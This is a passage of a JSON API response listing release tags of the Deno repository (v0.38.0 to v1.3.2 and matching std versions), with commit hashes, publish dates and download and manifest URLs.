/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.